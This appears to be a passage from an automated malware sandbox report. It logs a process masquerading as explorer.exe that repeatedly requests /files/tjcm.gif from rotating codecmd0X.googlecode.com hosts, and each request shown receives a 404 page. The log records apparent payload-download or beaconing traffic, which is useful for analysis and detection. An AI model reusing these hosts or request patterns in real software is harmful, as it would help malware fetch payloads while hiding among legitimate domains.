                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                      Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                      Sep 30, 2024 16:13:49.033322096 CEST494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                      Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      12192.168.2.54972474.125.206.8280320C:\Windows\Resources\Themes\explorer.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Sep 30, 2024 16:13:50.300542116 CEST215OUTGET /files/tjcm.gif HTTP/1.1
                                                                                                      Accept: */*
                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                      Host: codecmd01.googlecode.com
                                                                                                      Connection: Keep-Alive
                                                                                                      Sep 30, 2024 16:13:51.031826019 CEST1236INHTTP/1.1 404 Not Found
                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                      Referrer-Policy: no-referrer
                                                                                                      Content-Length: 1575
                                                                                                      Date: Mon, 30 Sep 2024 14:13:50 GMT
                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                      Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                      Sep 30, 2024 16:13:51.031955957 CEST494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                      Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      13192.168.2.549725108.177.15.8280320C:\Windows\Resources\Themes\explorer.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Sep 30, 2024 16:13:52.306200027 CEST215OUTGET /files/tjcm.gif HTTP/1.1
                                                                                                      Accept: */*
                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                      Host: codecmd02.googlecode.com
                                                                                                      Connection: Keep-Alive
                                                                                                      Sep 30, 2024 16:13:53.031761885 CEST1236INHTTP/1.1 404 Not Found
                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                      Referrer-Policy: no-referrer
                                                                                                      Content-Length: 1575
                                                                                                      Date: Mon, 30 Sep 2024 14:13:52 GMT
                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                      Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                      Sep 30, 2024 16:13:53.031783104 CEST494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                      Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      14192.168.2.549726108.177.15.8280320C:\Windows\Resources\Themes\explorer.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Sep 30, 2024 16:13:54.292011023 CEST215OUTGET /files/tjcm.gif HTTP/1.1
                                                                                                      Accept: */*
                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                      Host: codecmd03.googlecode.com
                                                                                                      Connection: Keep-Alive
                                                                                                      Sep 30, 2024 16:13:55.031645060 CEST1236INHTTP/1.1 404 Not Found
                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                      Referrer-Policy: no-referrer
                                                                                                      Content-Length: 1575
                                                                                                      Date: Mon, 30 Sep 2024 14:13:54 GMT
                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                      Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                      Sep 30, 2024 16:13:55.031671047 CEST494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                      Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      15192.168.2.54972774.125.206.8280320C:\Windows\Resources\Themes\explorer.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Sep 30, 2024 16:13:56.314245939 CEST215OUTGET /files/tjcm.gif HTTP/1.1
                                                                                                      Accept: */*
                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                      Host: codecmd01.googlecode.com
                                                                                                      Connection: Keep-Alive
                                                                                                      Sep 30, 2024 16:13:57.132921934 CEST1236INHTTP/1.1 404 Not Found
                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                      Referrer-Policy: no-referrer
                                                                                                      Content-Length: 1575
                                                                                                      Date: Mon, 30 Sep 2024 14:13:57 GMT
                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                      Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                      Sep 30, 2024 16:13:57.133095026 CEST494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                      Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      16192.168.2.549728108.177.15.8280320C:\Windows\Resources\Themes\explorer.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Sep 30, 2024 16:13:58.417239904 CEST215OUTGET /files/tjcm.gif HTTP/1.1
                                                                                                      Accept: */*
                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                      Host: codecmd02.googlecode.com
                                                                                                      Connection: Keep-Alive
                                                                                                      Sep 30, 2024 16:13:59.143460989 CEST1236INHTTP/1.1 404 Not Found
                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                      Referrer-Policy: no-referrer
                                                                                                      Content-Length: 1575
                                                                                                      Date: Mon, 30 Sep 2024 14:13:59 GMT
                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                      Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                      Sep 30, 2024 16:13:59.143481016 CEST494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                      Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      17192.168.2.549729108.177.15.8280320C:\Windows\Resources\Themes\explorer.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Sep 30, 2024 16:14:00.436534882 CEST215OUTGET /files/tjcm.gif HTTP/1.1
                                                                                                      Accept: */*
                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                      Host: codecmd03.googlecode.com
                                                                                                      Connection: Keep-Alive
                                                                                                      Sep 30, 2024 16:14:01.145768881 CEST1236INHTTP/1.1 404 Not Found
                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                      Referrer-Policy: no-referrer
                                                                                                      Content-Length: 1575
                                                                                                      Date: Mon, 30 Sep 2024 14:14:01 GMT
                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                      Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                      Sep 30, 2024 16:14:01.145795107 CEST494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                      Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      18192.168.2.54973074.125.206.8280320C:\Windows\Resources\Themes\explorer.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Sep 30, 2024 16:14:02.861031055 CEST215OUTGET /files/tjcm.gif HTTP/1.1
                                                                                                      Accept: */*
                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                      Host: codecmd01.googlecode.com
                                                                                                      Connection: Keep-Alive
                                                                                                      Sep 30, 2024 16:14:03.497431040 CEST1236INHTTP/1.1 404 Not Found
                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                      Referrer-Policy: no-referrer
                                                                                                      Content-Length: 1575
                                                                                                      Date: Mon, 30 Sep 2024 14:14:03 GMT
